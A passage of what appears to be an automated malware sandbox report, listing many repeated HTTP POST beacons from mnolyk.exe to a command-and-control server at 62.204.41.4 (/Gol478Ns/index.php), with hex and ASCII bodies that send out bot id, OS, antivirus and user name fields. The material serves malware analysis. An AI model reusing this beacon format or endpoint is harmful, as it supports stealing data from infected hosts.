                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    291192.168.2.34999362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:32:40.309536934 CET491OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:32:40.375819921 CET491INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:40 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    292192.168.2.34999462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:32:40.570822954 CET492OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:32:40.634799957 CET492INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:40 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    293192.168.2.34999562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:32:40.808312893 CET493OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:32:40.874547005 CET493INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:40 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    294192.168.2.34999662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:32:41.048048019 CET494OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:32:41.114902020 CET494INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:41 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    295192.168.2.34999762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:32:41.295556068 CET495OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:32:41.362737894 CET495INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:41 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    296192.168.2.34999862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:32:41.540596962 CET496OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:32:41.604485989 CET496INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:41 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    297192.168.2.34999962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:32:41.775058031 CET497OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:32:41.838279009 CET497INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:41 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    298192.168.2.35000062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:32:42.011738062 CET498OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:32:42.077291012 CET498INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:42 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    299192.168.2.35000162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:32:42.251605034 CET499OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:32:42.315658092 CET499INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:42 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    3192.168.2.34970462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:31:10.105006933 CET196OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:31:10.172152042 CET204INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:31:10 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    30192.168.2.34973262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:31:24.105231047 CET231OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:31:24.170511961 CET231INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:31:24 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    300192.168.2.35000262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:32:43.509977102 CET500OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:32:43.573843956 CET500INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:43 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    301192.168.2.35000362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:32:43.753417015 CET501OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:32:43.817357063 CET501INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:43 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    302192.168.2.35000462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:32:43.995455027 CET502OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:32:44.062264919 CET502INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:44 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    303192.168.2.35000562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:32:44.235622883 CET503OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:32:44.300940037 CET503INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:44 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    304192.168.2.35000662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:32:44.479967117 CET504OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:32:44.543730974 CET504INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:44 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    305192.168.2.35000762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:32:44.713026047 CET505OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:32:44.776062965 CET505INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:44 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    306192.168.2.35000862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:32:44.947787046 CET506OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:32:45.012370110 CET506INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:44 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    307192.168.2.35000962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:32:45.194375038 CET507OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:32:45.261404037 CET507INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:45 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    308192.168.2.35001062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:32:45.438687086 CET508OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
